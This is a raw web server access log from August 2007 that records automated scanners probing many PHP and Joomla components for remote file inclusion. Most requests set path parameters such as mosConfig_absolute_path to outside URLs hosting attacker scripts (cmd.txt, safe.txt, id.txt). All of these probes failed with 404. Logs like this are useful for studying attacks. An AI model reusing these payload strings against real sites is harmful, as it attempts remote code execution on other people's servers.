62.75.204.106 - - [26/Aug/2007:14:17:30 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.75.204.106 - - [26/Aug/2007:14:17:30 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.75.204.106 - - [26/Aug/2007:14:17:30 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.2.247.210 - - [26/Aug/2007:14:18:05 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:18:05 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.213.244 - - [26/Aug/2007:14:18:26 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:14:18:37 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:14:18:38 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:19:18 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:19:18 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:19:44 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:19:44 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:19:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:19:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:20:14 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:20:14 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:20:14 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.17.2.146 - - [26/Aug/2007:14:20:14 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:20:27 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.135.39.23 - - [26/Aug/2007:14:20:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:14:20:49 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.75.204.106 - - [26/Aug/2007:14:20:49 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.75.204.106 - - [26/Aug/2007:14:20:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.75.204.106 - - [26/Aug/2007:14:20:50 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
66.135.39.23 - - [26/Aug/2007:14:21:02 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:21:02 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.153.252.55 - - [26/Aug/2007:14:23:31 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [26/Aug/2007:14:23:33 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.153.252.55 - - [26/Aug/2007:14:23:33 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.204.17.137 - - [26/Aug/2007:14:24:08 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.204.17.137 - - [26/Aug/2007:14:24:08 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [26/Aug/2007:14:24:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [26/Aug/2007:14:24:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [26/Aug/2007:14:24:09 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [26/Aug/2007:14:24:09 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:14:25:06 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:14:25:06 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.213.244 - - [26/Aug/2007:14:26:26 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.244 - - [26/Aug/2007:14:26:26 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.214.144 - - [26/Aug/2007:14:26:52 -0700] "GET /logs/access_070716.log/index.php?pagina=http://www.brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.214.144 - - [26/Aug/2007:14:26:52 -0700] "GET /index.php?pagina=http://www.brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.214.144 - - [26/Aug/2007:14:26:53 -0700] "GET /logs/index.php?pagina=http://www.brendonmorris.co.za/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.204.130 - - [26/Aug/2007:14:27:08 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://portaljhn.iespana.es/r3c4/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:14:28:02 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.20.65.213 - - [26/Aug/2007:14:28:27 -0700] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:14:28:31 -0700] "GET /logs/access_070806.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:28:39 -0700] "GET /logs/announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:28:39 -0700] "GET /announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:28:42 -0700] "GET /logs/announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:28:43 -0700] "GET /announcements.php?phpraid_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.147.177 - - [26/Aug/2007:14:28:43 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
219.94.147.177 - - [26/Aug/2007:14:28:43 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
219.94.147.177 - - [26/Aug/2007:14:28:43 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.94.147.177 - - [26/Aug/2007:14:28:43 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.19.182.51 - - [26/Aug/2007:14:28:52 -0700] "GET /logs/access_070813.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:29:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:29:48 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.58.105.162 - - [26/Aug/2007:14:31:17 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [26/Aug/2007:14:31:17 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.58.105.162 - - [26/Aug/2007:14:31:17 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.58.105.162 - - [26/Aug/2007:14:31:17 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.244.166.76 - - [26/Aug/2007:14:32:22 -0700] "GET /logs/access_070813.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.4.224.103 - - [26/Aug/2007:14:33:39 -0700] "GET /logs/access_070813.log HTTP/1.1" 304 - "file://C|\\Documents and Settings\\Administrator\\Desktop\\FF\\FF.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)" "galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:05 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:05 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.135.39.23 - - [26/Aug/2007:14:34:05 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:09 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:10 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:10 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:14 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:14 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.135.39.23 - - [26/Aug/2007:14:34:14 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:14 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:29 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.135.39.23 - - [26/Aug/2007:14:34:30 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [26/Aug/2007:14:35:13 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.30.60.158 - - [26/Aug/2007:14:35:13 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.30.60.158 - - [26/Aug/2007:14:35:14 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.30.60.158 - - [26/Aug/2007:14:35:14 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
212.241.213.244 - - [26/Aug/2007:14:35:30 -0700] "GET /logs/access_070813.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:14:35:44 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:14:35:44 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [26/Aug/2007:14:35:44 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [26/Aug/2007:14:35:45 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [26/Aug/2007:14:36:58 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.169.150 - - [26/Aug/2007:14:36:59 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.78.98.108 - - [26/Aug/2007:14:38:07 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.28.18.238 - - [26/Aug/2007:14:39:10 -0700] "GET /logs/access_070730.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.28.18.238 - - [26/Aug/2007:14:39:11 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.28.18.238 - - [26/Aug/2007:14:39:11 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.28.18.238 - - [26/Aug/2007:14:40:10 -0700] "GET /logs/access_070813.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
128.121.78.221 - - [26/Aug/2007:14:40:55 -0700] "GET /logs/access_070813.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.78.221 - - [26/Aug/2007:14:40:55 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.26.201 - - [26/Aug/2007:14:43:24 -0700] "GET /logs/access_070101.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.25.232 - - [26/Aug/2007:14:46:51 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.20.65.213 - - [26/Aug/2007:14:47:21 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:49:22 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:49:22 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.24.101 - - [26/Aug/2007:14:49:46 -0700] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
193.205.80.54 - - [26/Aug/2007:14:50:41 -0700] "GET /logs/access.log/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.205.80.54 - - [26/Aug/2007:14:50:41 -0700] "GET /public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.205.80.54 - - [26/Aug/2007:14:50:42 -0700] "GET /logs/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:14:50:55 -0700] "GET /logs/!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.150.70.2 - - [26/Aug/2007:14:50:55 -0700] "GET /!scanhttp://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.249.135.2 - - [26/Aug/2007:14:51:24 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://afltech.host.sk/alat/hajar.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.249.135.2 - - [26/Aug/2007:14:51:24 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://afltech.host.sk/alat/hajar.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.205.80.54 - - [26/Aug/2007:14:51:51 -0700] "GET /logs/access_070618.log/public/displayCategory.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
208.115.34.17 - - [26/Aug/2007:14:53:01 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.115.34.17 - - [26/Aug/2007:14:53:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:54:33 -0700] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:54:33 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:54:34 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
